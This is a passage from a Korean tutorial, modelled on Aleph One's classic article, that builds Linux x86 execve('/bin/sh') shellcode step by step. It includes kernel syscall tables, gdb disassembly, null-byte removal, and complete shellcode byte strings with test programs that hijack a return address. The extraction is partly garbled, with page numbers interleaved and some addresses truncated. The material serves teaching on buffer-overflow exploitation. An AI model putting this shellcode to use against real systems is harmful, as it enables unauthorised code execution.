70 #include <linux/linkage.h> #include <asm/segment.h> #include <asm/smp.h> EBX = 0x00 ECX = 0x04 EDX = 0x08 ESI = 0x0C EDI = 0x10 EBP = 0x14 EAX = 0x18 DS = 0x1C ES = 0x20 ORIG_EAX = 0x24 EIP = 0x28 CS = 0x2C EFLAGS = 0x30 OLDESP = 0x34 OLDSS = 0x38 CF_MASK = 0x IF_MASK = 0x NT_MASK = 0x VM_MASK = 0x /* * these are offsets into the task-struct. */ state = 0 flags = 4 sigpending = 8 addr_limit = 12 exec_domain = 16 need_resched = 20 69

71 tsk_ptrace = 24 cpu = 32 ENOSYS = 38 #define SAVE_ALL cld; pushl %es; pushl %ds; pushl %eax; pushl %ebp; pushl %edi; pushl %esi; pushl %edx; pushl %ecx; pushl %ebx; movl $( KERNEL_DS),%edx; movl %edx,%ds; movl %edx,%es; -- 중략 --.data ENTRY(sys_call_table).long SYMBOL_NAME(sys_ni_syscall) /* 0 - old "setup()" system call*/.long SYMBOL_NAME(sys_exit).long SYMBOL_NAME(sys_fork).long SYMBOL_NAME(sys_read).long SYMBOL_NAME(sys_write).long SYMBOL_NAME(sys_open) /* 5 */.long SYMBOL_NAME(sys_close).long SYMBOL_NAME(sys_waitpid).long SYMBOL_NAME(sys_creat) 70

72 .long SYMBOL_NAME(sys_link).long SYMBOL_NAME(sys_unlink) /* 10 */.long SYMBOL_NAME(sys_execve) /* 11 */.long SYMBOL_NAME(sys_chdir).long SYMBOL_NAME(sys_time).long SYMBOL_NAME(sys_mknod).long SYMBOL_NAME(sys_chmod) /* 15 */.long SYMBOL_NAME(sys_lchown16).long SYMBOL_NAME(sys_ni_syscall) /* old break syscall holder */.long SYMBOL_NAME(sys_stat).long SYMBOL_NAME(sys_lseek).long SYMBOL_NAME(sys_getpid) /* 20 */.long SYMBOL_NAME(sys_mount).long SYMBOL_NAME(sys_oldumount).long SYMBOL_NAME(sys_setuid16).long SYMBOL_NAME(sys_getuid16).long SYMBOL_NAME(sys_stime) /* 25 */.long SYMBOL_NAME(sys_ptrace).long SYMBOL_NAME(sys_alarm).long SYMBOL_NAME(sys_fstat).long SYMBOL_NAME(sys_pause).long SYMBOL_NAME(sys_utime) /* 30 */ -- 중략 --.long SYMBOL_NAME(sys_chown).long SYMBOL_NAME(sys_setuid).long SYMBOL_NAME(sys_setgid).long SYMBOL_NAME(sys_setfsuid) /* 215 */.long SYMBOL_NAME(sys_setfsgid).long SYMBOL_NAME(sys_pivot_root) 71

73 .long SYMBOL_NAME(sys_mincore).long SYMBOL_NAME(sys_madvise).long SYMBOL_NAME(sys_getdents64) /* 220 */.long SYMBOL_NAME(sys_fcntl64) #ifdef CONFIG_TUX.long SYMBOL_NAME( sys_tux) #else # ifdef CONFIG_TUX_MODULE.long SYMBOL_NAME(sys_tux) # else.long SYMBOL_NAME(sys_ni_syscall) # endif #endif.long SYMBOL_NAME(sys_ni_syscall) /* Reserved for Security */.long SYMBOL_NAME(sys_gettid).long SYMBOL_NAME(sys_readahead) /* 225 */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for setxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for lsetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for fsetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for getxattr */.long SYMBOL_NAME(sys_ni_syscall) /* 230 reserved for lgetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for fgetxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for listxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for llistxattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for flistxattr */.long SYMBOL_NAME(sys_ni_syscall) /* 235 reserved for removexattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for lremovexattr */.long SYMBOL_NAME(sys_ni_syscall) /* reserved for fremovexattr */.long SYMBOL_NAME(sys_tkill).rept NR_syscalls-(.-sys_call_table)/4.long SYMBOL_NAME(sys_ni_syscall) 72

74 .endr 위의내용을보기쉽게표로정리하면다음과같다. 아래의자료는인터넷상에서구한 것 20 으로커널 2.2 버전에서추출한것이다. 쉘코드를만들때사용되는것에는색깔을넣었다. %eax Name Source %ebx %ecx %edx 1 sys_exit kernel/exit.c int sys_fork arch/i386/kernel/process.c struct pt_regs sys_read fs/read_write.c unsigned int char * size_t 4 sys_write fs/read_write.c unsigned int const char * size_t 5 sys_open fs/open.c const char * int int 6 sys_close fs/open.c unsigned int sys_waitpid kernel/exit.c pid_t unsigned int * int 8 sys_creat fs/open.c const char * int - 9 sys_link fs/namei.c const char * const char * - 10 sys_unlink fs/namei.c const char * sys_execve arch/i386/kernel/process.c struct pt_regs sys_chdir fs/open.c const char * sys_time kernel/time.c int * sys_mknod fs/namei.c const char * int dev_t 15 sys_chmod fs/open.c const char * mode_t - 16 sys_lchown fs/open.c const char * uid_t gid_t 18 sys_stat fs/stat.c char * struct old_kernel_stat * - 19 sys_lseek fs/read_write.c unsigned int off_t unsigned int 20 sys_getpid kernel/sched.c sys_mount fs/super.c char * char * char * 22 sys_oldumount fs/super.c char * sys_setuid kernel/sys.c uid_t sys_getuid kernel/sched.c sys_stime kernel/time.c int * sys_ptrace arch/i386/kernel/ptrace.c long long long

75 27 sys_alarm kernel/sched.c unsigned int sys_fstat fs/stat.c unsigned int struct old_kernel_stat * - 29 sys_pause arch/i386/kernel/sys_i386.c sys_utime fs/open.c char * struct utimbuf * - 33 sys_access fs/open.c const char * int - 34 sys_nice kernel/sched.c int sys_sync fs/buffer.c sys_kill kernel/signal.c int int - 38 sys_rename fs/namei.c const char * const char * - 39 sys_mkdir fs/namei.c const char * int - 40 sys_rmdir fs/namei.c const char * sys_dup fs/fcntl.c unsigned int sys_pipe arch/i386/kernel/sys_i386.c unsigned long * sys_times kernel/sys.c struct tms * sys_brk mm/mmap.c unsigned long sys_setgid kernel/sys.c gid_t sys_getgid kernel/sched.c sys_signal kernel/signal.c int sighandler_t - 49 sys_geteuid kernel/sched.c sys_getegid kernel/sched.c sys_acct kernel/acct.c const char * sys_umount fs/super.c char * int - 54 sys_ioctl fs/ioctl.c unsigned int unsigned int unsigned long 55 sys_fcntl fs/fcntl.c unsigned int unsigned int unsigned long 57 sys_setpgid kernel/sys.c pid_t pid_t - 59 sys_olduname arch/i386/kernel/sys_i386.c struct oldold_utsname * sys_umask kernel/sys.c int sys_chroot fs/open.c const char * sys_ustat fs/super.c dev_t struct ustat * - 63 sys_dup2 fs/fcntl.c unsigned int unsigned int - 64 sys_getppid kernel/sched.c sys_getpgrp kernel/sys.c sys_setsid kernel/sys.c

76 67 sys_sigaction arch/i386/kernel/signal.c int const struct old_sigaction * 68 sys_sgetmask kernel/signal.c sys_ssetmask kernel/signal.c int sys_setreuid kernel/sys.c uid_t uid_t - 71 sys_setregid kernel/sys.c gid_t gid_t - struct old_sigaction * 72 sys_sigsuspend arch/i386/kernel/signal.c int int old_sigset_t 73 sys_sigpending kernel/signal.c old_sigset_t * sys_sethostname kernel/sys.c char * int - 75 sys_setrlimit kernel/sys.c unsigned int struct rlimit * - 76 sys_getrlimit kernel/sys.c unsigned int struct rlimit * - 77 sys_getrusage kernel/sys.c int struct rusage * - 78 sys_gettimeofday kernel/time.c struct timeval * struct timezone * - 79 sys_settimeofday kernel/time.c struct timeval * struct timezone * - 80 sys_getgroups kernel/sys.c int gid_t * - 81 sys_setgroups kernel/sys.c int gid_t * - 82 old_select arch/i386/kernel/sys_i386.c struct sel_arg_struct * sys_symlink fs/namei.c const char * const char * - 84 sys_lstat fs/stat.c char * struct old_kernel_stat * - 85 sys_readlink fs/stat.c const char * char * int 86 sys_uselib fs/exec.c const char * sys_swapon mm/swapfile.c const char * int - 88 sys_reboot kernel/sys.c int int int 89 old_readdir fs/readdir.c unsigned int void * unsigned int 90 old_mmap arch/i386/kernel/sys_i386.c struct mmap_arg_struct * sys_munmap mm/mmap.c unsigned long size_t - 92 sys_truncate fs/open.c const char * unsigned long - 93 sys_ftruncate fs/open.c unsigned int unsigned long - 94 sys_fchmod fs/open.c unsigned int mode_t - 95 sys_fchown fs/open.c unsigned int uid_t gid_t 96 sys_getpriority kernel/sys.c int int - 97 sys_setpriority kernel/sys.c int int int 99 sys_statfs fs/open.c const char * struct statfs * - 75

77 100 sys_fstatfs fs/open.c unsigned int struct statfs * sys_ioperm arch/i386/kernel/ioport.c unsigned long unsigned long int 102 sys_socketcall net/socket.c int unsigned long * sys_syslog kernel/printk.c int char * int 104 sys_setitimer kernel/itimer.c int struct itimerval * struct itimerval * 105 sys_getitimer kernel/itimer.c int struct itimerval * sys_newstat fs/stat.c char * struct stat * sys_newlstat fs/stat.c char * struct stat * sys_newfstat fs/stat.c unsigned int struct stat * sys_uname arch/i386/kernel/sys_i386.c struct old_utsname * sys_iopl arch/i386/kernel/ioport.c unsigned long sys_vhangup fs/open.c sys_idle arch/i386/kernel/process.c sys_vm86old arch/i386/kernel/vm86.c unsigned long struct vm86plus_struct * 114 sys_wait4 kernel/exit.c pid_t unsigned long * int options 115 sys_swapoff mm/swapfile.c const char * sys_sysinfo kernel/info.c struct sysinfo * sys_ipc arch/i386/kernel/sys_i386.c uint int int 118 sys_fsync fs/buffer.c unsigned int sys_sigreturn arch/i386/kernel/signal.c unsigned long sys_clone arch/i386/kernel/process.c struct pt_regs sys_setdomainname kernel/sys.c char * int sys_newuname kernel/sys.c struct new_utsname * sys_modify_ldt arch/i386/kernel/ldt.c int void * unsigned long 124 sys_adjtimex kernel/time.c struct timex * sys_mprotect mm/mprotect.c unsigned long size_t unsigned long 126 sys_sigprocmask kernel/signal.c int old_sigset_t * old_sigset_t * 127 sys_create_module kernel/module.c const char * size_t sys_init_module kernel/module.c const char * struct module * sys_delete_module kernel/module.c const char * sys_get_kernel_syms kernel/module.c struct kernel_sym * sys_quotactl fs/dquot.c int const char * int 132 sys_getpgid kernel/sys.c pid_t

78 133 sys_fchdir fs/open.c unsigned int sys_bdflush fs/buffer.c int long sys_sysfs fs/super.c int unsigned long unsigned long 136 sys_personality kernel/exec_domain.c unsigned long sys_setfsuid kernel/sys.c uid_t sys_setfsgid kernel/sys.c gid_t sys_llseek fs/read_write.c unsigned int unsigned long unsigned long 141 sys_getdents fs/readdir.c unsigned int void * unsigned int 142 sys_select fs/select.c int fd_set * fd_set * 143 sys_flock fs/locks.c unsigned int unsigned int sys_msync mm/filemap.c unsigned long size_t int 145 sys_readv fs/read_write.c unsigned long const struct iovec * unsigned long 146 sys_writev fs/read_write.c unsigned long const struct iovec * unsigned long 147 sys_getsid kernel/sys.c pid_t sys_fdatasync fs/buffer.c unsigned int sys_sysctl kernel/sysctl.c struct sysctl_args * sys_mlock mm/mlock.c unsigned long size_t sys_munlock mm/mlock.c unsigned long size_t sys_mlockall mm/mlock.c int sys_munlockall mm/mlock.c sys_sched_setparam kernel/sched.c pid_t struct sched_param * sys_sched_getparam kernel/sched.c pid_t struct sched_param * sys_sched_setscheduler kernel/sched.c pid_t int 157 sys_sched_getscheduler kernel/sched.c pid_t sys_sched_yield kernel/sched.c sys_sched_get_priority_max kernel/sched.c int sys_sched_get_priority_min kernel/sched.c int sys_sched_rr_get_interval kernel/sched.c pid_t struct timespec * sys_nanosleep kernel/sched.c struct timespec * struct timespec - struct sched_param * 163 sys_mremap mm/mremap.c unsigned long unsigned long unsigned long 164 sys_setresuid kernel/sys.c uid_t uid_t uid_t 165 sys_getresuid kernel/sys.c uid_t * uid_t * uid_t * 166 sys_vm86 arch/i386/kernel/vm86.c struct vm86_struct * sys_query_module kernel/module.c const char * int char * 77

79 168 sys_poll fs/select.c struct pollfd * unsigned int long 169 sys_nfsservctl fs/filesystems.c int void * void * 170 sys_setresgid kernel/sys.c gid_t gid_t gid_t 171 sys_getresgid kernel/sys.c gid_t * gid_t * gid_t * 172 sys_prctl kernel/sys.c int unsigned long unsigned long 173 sys_rt_sigreturn arch/i386/kernel/signal.c unsigned long sys_rt_sigaction kernel/signal.c int const struct sigaction * struct sigaction * 175 sys_rt_sigprocmask kernel/signal.c int sigset_t * sigset_t * 176 sys_rt_sigpending kernel/signal.c sigset_t * size_t sys_rt_sigtimedwait kernel/signal.c const sigset_t * siginfo_t * const struct timespec * 178 sys_rt_sigqueueinfo kernel/signal.c int int siginfo_t * 179 sys_rt_sigsuspend arch/i386/kernel/signal.c sigset_t * size_t sys_pread fs/read_write.c unsigned int char * size_t 181 sys_pwrite fs/read_write.c unsigned int const char * size_t 182 sys_chown fs/open.c const char * uid_t gid_t 183 sys_getcwd fs/dcache.c char * unsigned long sys_capget kernel/capability.c cap_user_header_t cap_user_data_t sys_capset kernel/capability.c cap_user_header_t const cap_user_data_t sys_sigaltstack arch/i386/kernel/signal.c const stack_t * stack_t * sys_sendfile mm/filemap.c int int off_t * 190 sys_vfork arch/i386/kernel/process.c struct pt_regs - - 0x80002c5 < execve+9>: movl 0x8(%ebp),%ebx /bin/sh 의주소를 ebx 로복사한다. 0x80002c8 < execve+12>: movl 0xc(%ebp),%ecx name[] 의주소를 ecx 로복사한다. 0x80002cb < execve+15>: movl 0x10(%ebp),%edx 널포인터의주소를 edx 로복사한다. 78

80 0x80002ce < execve+18>: int $0x80 커널모드로변경된다. 여기에대해서는각주 19번에서간단히알아보았으나다시한번더부연설명하면, int $0x80 에서 int는프로그래밍에서변수를선언할때붙이는정수의변수타입이아니라어셈블리어에서사용되는기계어명령이라는것을잊지말아야한다. int라는기계어명령어는서브루틴인바이오스함수 (bios function) 를호출한다. 즉, 여기서는 execve() 라는시스템호출을실행하게된다는의미이다. 정리하면리눅스에서는특정시스템호출을실행하기위해 int $0x80 라는것을사용한다고알아두면되겠다. 이제 execve() 시스템호출과정에서어떤일이일어나는지간단히정리해보면다음과같다. a) null로끝나는문자열 "/bin/sh" 을메모리어딘가에적재 name[0]= "/bin/sh"; b) 문자열 "/bin/sh" 의주소를메모리에적재 name[0] 은포인터 (char *name[2]) c) 0xb를 eax 레지스터에복사 - movl $0xb,%eax d) 문자열 "/bin/sh" 의주소의주소를 ebx 레지스터에복사 - movl 0x8(%ebp),%ebx e) 문자열 "/bin/sh" 의주소를 ecx 레지스터에복사 - movl 0xc(%ebp),%ecx f) null long word의주소를 edx 레지스터에복사 - movl 0x10(%ebp),%edx g) int $0x80 instruction을실행 - int $0x80 그런데 execve() 호출이실패할경우스택으로부터 instruction을계속해서가져오려고할것이고, 그결과원치않는무작위데이터를포함할수있으며, core를덤프할수있다. 그래서이런문제를예방하기위해 exit() 시스템호출을추가할필요가있다. exit() 시스템호출은다음과같다. exit.c #include <stdlib.h> void main() { exit(0); 이것을컴파일하여 gdb 로살펴보면다음과같다. 79

81 [aleph1]$ gcc -o exit -static exit.c [aleph1]$ gdb exit GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... disassemble _exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp,%ebp 0x800034f <_exit+3>: pushl %ebx 0x <_exit+4>: movl $0x1,%eax 0x <_exit+9>: movl 0x8(%ebp),%ebx 0x <_exit+12>: int $0x80 0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx 0x800035d <_exit+17>: movl %ebp,%esp 0x800035f <_exit+19>: popl %ebp 0x <_exit+20>: 0x <_exit+21>: 0x <_exit+22>: 0x <_exit+23>: ret nop nop nop End of assembler dump exit 시스템호출은 eax 레지스터에 0x1를위치시키고, exit 코드를 ebx 레지스터에위치시키며, 그런다음 int $0x80 을실행한다. 여기서왜 0x1을 eax 레지스터에위치시키는지는앞에서보았던 syscall table을보면쉽게알수있다. 대부분의어플리케이션은에러없이종료할때 0을돌려준다는것을잘알것이다. 그래서 ebx에 0을위치시킨다. 이제앞의것과연결하여정리하면다음과같다. 80

82 a) null로끝나는문자열 "/bin/sh" 을메모리어딘가에적재 name[0]= "/bin/sh"; b) 문자열 "/bin/sh" 의주소를메모리에적재 name[0] 은포인터 (char *name[2]) c) 0xb를 eax 레지스터에복사 - movl $0xb,%eax d) 문자열 "/bin/sh" 의주소의주소를 ebx 레지스터에복사 - movl 0x8(%ebp),%ebx e) 문자열 "/bin/sh" 의주소를 ecx 레지스터에복사 - movl 0xc(%ebp),%ecx f) null long word의주소를 edx 레지스터에복사 - movl 0x10(%ebp),%edx g) int $0x80 instruction을실행 - int $0x80 h) eax 레지스터에 0x1를복사 - movl $0x1,%eax i) ebx 레지스터에 0x0을복사 - movl $0x0,%ebx j) int $0x80 명령실행 - int $0x80 이제남은것은어셈블리언어로이것들을조합하는것인데, 이때기억해야할것은코드 다음에문자열을위치시켜야하며, 그문자열의주소와 null word 를문자열배열다음에 위치시킨다는것이다. 그러면다음과같은모양이나온다 movl string_addr,string_addr_addr movb movl movl movl leal leal $0x0,null_byte_addr $0x0,null_addr $0xb,%eax string_addr,%ebx string_addr,%ecx null_string,%edx int $0x80 movl movl $0x1, %eax $0x0, %ebx int $0x80 /bin/sh 문자열은여기에위치 ( 코드다음에문자열이위치한다는것때문에 ) 이제문제는우리가공격하고자하는취약한프로그램의메모리공간어디에위의코드와 /bin/sh이라는문자열이놓일지알지못한다는것이다. 이것에대한해결책의하나로써 JMP와 CALL instruction을사용하는것이다. JMP와 CALL instruction은 IP reative addressing 방식은 81

83 jump하고자원하는정확한주소를알필요없이현재의 IP로부터의 offset으로 jump할수있는방식이다. 만약 "/bin/sh" 문자열바로앞에 CALL instruction을위치시키고, 그것다음에 JMP instruction을위치시키면문자열의주소는 CALL이실행될때리턴어드레스로서스택에 push되게된다. 그러면이제필요한것은레지스터로그리턴어드레스를복사하는것이다. CALL instruction은위의코드의시작을간단히호출할수있다. JMP instruction에대해 J, CALL instruction에대해 C라고하고, 문자열 (string) 에대해서는 s라고한다면실행흐름은다음과같을것이다. bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of memory 89ABCDEF AB CDEF AB CDEF memory buffer sfp ret a b c < [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] ^ ^ ^ (1) (2) (3) top of stack bottom of stack 이렇게수정한표를참고로해서각 instruction 이얼마나많은바이트를차지할지를알아보면 다음과같다 jmp offset-to-call # 2 bytes popl %esi # 1 byte movl %esi,array-offset(%esi) # 3 bytes movb $0x0,nullbyteoffset(%esi) # 4 bytes movl $0x0,null-offset(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal array-offset,(%esi),%ecx # 3 bytes leal null-offset(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call offset-to-popl # 5 bytes /bin/sh 문자열이여기에위치

84 jmp 에서 call 까지, call 에서 popl 까지, 문자열주소에서배열까지, 그리고그문자열주소에서 null long word 까지 offset 을계산하면다음과같다 jmp 0x26 # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2b # 5 bytes.string \"/bin/sh\" # 8 bytes 이제정확하게작동하는지확인하기위해컴파일하여실행해본다. 하지만한가지문제가있는데, 대부분의운영체제가코드를읽기전용으로표시하는것이다. 이제한문제를해결하기위해실행하고자원하는코드를스택이나데이터세그먼트 (data segment) 에위치시키고, 그것에통제권을이전시킨다. 그렇게하기위해데이터세그먼트에있는전역배열 (global array) 에코드를위치시킨다. 이를위해먼저바이너리코드를십진수로나타낼필요가있다. 이를위해컴파일하여 gdb를사용한다. shellcodeasm.c void main() { asm (" jmp 0x2a # 3 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes 83

85 "); leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes.string \"/bin/sh\" # 8 bytes [aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c [aleph1]$ gdb shellcodeasm GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... disassemble main Dump of assembler code for function main: 0x <main>: pushl %ebp 0x <main+1>: movl %esp,%ebp 0x <main+3>: jmp 0x800015f <main+47> 0x <main+5>: popl %esi 0x <main+6>: movl %esi,0x8(%esi) 0x <main+9>: movb $0x0,0x7(%esi) 0x800013d <main+13>: movl $0x0,0xc(%esi) 0x <main+20>: movl $0xb,%eax 0x <main+25>: movl %esi,%ebx 0x800014b <main+27>: leal 0x8(%esi),%ecx 0x800014e <main+30>: leal 0xc(%esi),%edx 0x <main+33>: int $0x80 0x <main+35>: movl $0x1,%eax 0x <main+40>: movl $0x0,%ebx 0x800015d <main+45>: int $0x80 0x800015f <main+47>: call 0x <main+5> 0x <main+52>: das 0x <main+53>: boundl 0x6e(%ecx),%ebp 0x <main+56>: das 0x <main+57>: jae 0x80001d3 < new_exitfn+55> 0x800016b <main+59>: addb %cl,0x55c35dec(%ecx) End of assembler dump. x/bx main+3 0x <main+3>: 0xeb 0x <main+4>: 0x2a 84

86 ... 이렇게추출한코드를이용해쉘코드를만들어본다. testsc.c char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; /* main() 함수의리턴어드레스를덮어쓰기위한용도의정수형포인터선언 */ ret = (int *)&ret + 2; /* ret 의주소에 2 를더하여 main() 함수의리턴어드레스를덮어씀 */ (*ret) = (int)shellcode; /* ret 포인터변수의값에 shellcode 할당 main() 함수가종료되면 shellcode 가실행 */ 컴파일하여실행해보면아래와같이실행이잘된다. [aleph1]$ gcc -o testsc testsc.c [aleph1]$./testsc $ exit [aleph1]$ 그러나한가지문제가있다. 보통우리가공격하고자하는것은문자열배열이며, 이경우 null 바이트 ($0x0) 가쉘코드에나오게되면문자열의끝으로프로그램은판단하게되고, 쉘코드를특정주소에복사하는작업을종료하게된다. 이것은 C 언어의기초를가진독자라면잘알고있는사실이다. 그래서쉘코드에 0x0 이나오면안되고, 따라서 null byte를없애주어야한다. 85

87 문제가있는경우 : null byte를제거한수정된경우 : movb $0x0,0x7(%esi) xorl %eax,%eax movl $0x0,0xc(%esi) movb %eax,0x7(%esi) movl %eax,0xc(%esi) movl $0xb,%eax movb $0xb,%al movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax inc %eax 먼저첫부분의 null byte 를제거해보자. 초보자들은다소어렵게보이지만아주간단하다. 위에서 null byte 를제거하는방법에대해서알아보자. 우선 xor 이라는 instruction 에대해서 알아야한다. xor instruction 은레지스터를클리어시켜주는명령어이다. xor instruction 을 이용해 eax 레지스터를클리어시켜 null byte 를제거한후 eax 레지스터를 0x7 과 0xc 로각각 복사해준다. 이부분을순서대로정리하면다음과같다. 1. null byte 제거 : $0x0 - xorl %eax,%eax 2. null byte 가제거된 %eax 를 0x7(%esi) 에복사 - movb %eax,0x7(%esi) 3. null byte 가제거된 %eax 를 0xc(%esi) 에복사 - movl %eax,0xc(%esi) 이제 movl $0xb,%eax 부분을수정해보자. 일부독자들은이부분을수정하는것을 이상하게생각할지도모른다. Aleph One 의글에서는추출된코드를모아둔 char shellcode[] ="\xeb\x2a\x5e\x89\x76\ \x5d\xc3"; 부분에있는쉘코드에만나와있어정확하게그위치를 파악하기힘든데, objdump 명령을이용해내용을덤퍼해보면 movl $0xb,%eax 이부분은 b8 x0b x00 x00 x00 처럼되어있다. 즉, null byte가포함되어있는것이다. %eax에 null byte가포함되어있다는것은바로앞에서알아본바와같다. 여기서는직접적으로코드에 null byte 문자 0x0이없으므로 xor instruction을사용하지않는다. 대신 %eax를 %al로수정한다. 여기서잠깐앞에서살펴보았던스택영역섹션에서다루었던레지스터에대해간단하게다시알아보자. Intel 8086 레지스터에서는 16비트레지스터 ax, bx, cx 등이사용되었지만 80386에서는 32비트로변경되었다. 그래서레지스터의이름도 eax, abx,ecx 등으로수정되었다. 여기서앞에붙은 e 는 16비트를사용하는 8086 상의레지스터에상응하는레지스터가 32비트를사용하는 80386으로확장됨 (extension) 의의미를갖고있다. 그리고 ax든 eax든뒤에붙어있는 x는 extended를의미한다. 이것은 16비트레지스터는 86

88 8 비트씩두개로나누어지며, 그래서 AX 는 AH 와 AL 로나누어져있다는것을의미한다. 여기서 H 는 high, L 은 low 를의미한다. 다시코드수정으로돌아가, movl $0xb,%eax 에서 %eax 를 세분화하여 movb $0xb,%al 처럼 %al 로위치시킨다. 아직기억하고있겠지만 $0xb 는 syscall 테이블에서 execve() 시스템호출을나타낸다고했었다. 이제는문제가되었던마지막부분을수정하는작업만남았다. movl $0x1, %eax 이 부분역시 Aleph One 의원문에는쉘코드부분에만나와있지 gdb 를이용한부분에는나와있지 않아초보자들이역시혼동하는부분이기도하다. 이나머지부분도앞의방법대로다음과 같이수정한다. 1. null byte 제거 : $0x0 - xorl %ebx,%ebx 2. 클리어된 %ebx 를 %eax 에위치시킴 - movl %ebx,%eax 3. %eax 를 1 씩증가시킴 - inc %eax 이제최종적으로아무런문제가없는코드를가지게되었다. 정리하면다음과같다. shellcodeasm2.c void main() { asm (" jmp 0x1f # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes xorl %eax,%eax # 2 bytes movb %eax,0x7(%esi) # 3 bytes movl %eax,0xc(%esi) # 3 bytes movb $0xb,%al # 2 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes xorl %ebx,%ebx # 2 bytes movl %ebx,%eax # 2 bytes inc %eax # 1 bytes int $0x80 # 2 bytes call -0x24 # 5 bytes.string \"/bin/sh\" # 8 bytes # 46 bytes total ");

89 이코드를컴파일하여앞에서와같은방법으로쉘코드를추출하면다음과같다. 아래의 쉘코드에서는 null byte 가제거된것을볼수있다 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 이제이추출한쉘코드를이용해쉘을실행하는코드를다음과같이작성하여컴파일하고, 실행해보면정상적으로쉘이뜨고, 오버플로우공격에서활용할수있게되었다. testsc2.c char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; [aleph1]$ gcc -o testsc2 testsc2.c [aleph1]$./testsc2 $ exit [aleph1]$ 이제는 Aleph One 이사용한방법을필자의시스템에서그대로적용해보고, 좀더간단히 쉘코드를만드는방법에대해서도간단히설명하도록하겠다. Aleph One 의방법에대해서는 88

90 이미앞에서충분한설명이이루어졌으므로바로실습으로들어간다. shell을실행하는어셈블리어코드는다음과같다 jmp callz start: popl %esi movl movb movl movl movl leal leal %esi,0x8(%esi) $0x0,0x7(%esi) $0x0,0xc(%esi) $0xb,%eax %esi,%ebx 0x8(%esi),%ecx 0xc(%esi),%edx int $0x80 movl movl $0x1,%eax $0x0,%ebx int $0x80 callz: call start.string \"/bin/sh\" test]$ vi shellcodemake1.c #include <stdio.h> void main() { asm (" jmp callz start: popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax 89

91 movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1,%eax movl $0x0,%ebx int $0x80 callz: call start.string "/bin/sh " "); test]$ gcc o shellcodemake1 shellcodemake1.c shellcodemake1.c: In function `main': shellcodemake1.c:4: warning: return type of `main' is not `int' [vangelis@localhost test]$ gdb shellcodemake1 GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: jmp 0x804845f <callz> 0x <start>: pop %esi 0x <start+1>: mov %esi,0x8(%esi) 0x <start+4>: movb $0x0,0x7(%esi) 0x804843d <start+8>: movl $0x0,0xc(%esi) 90

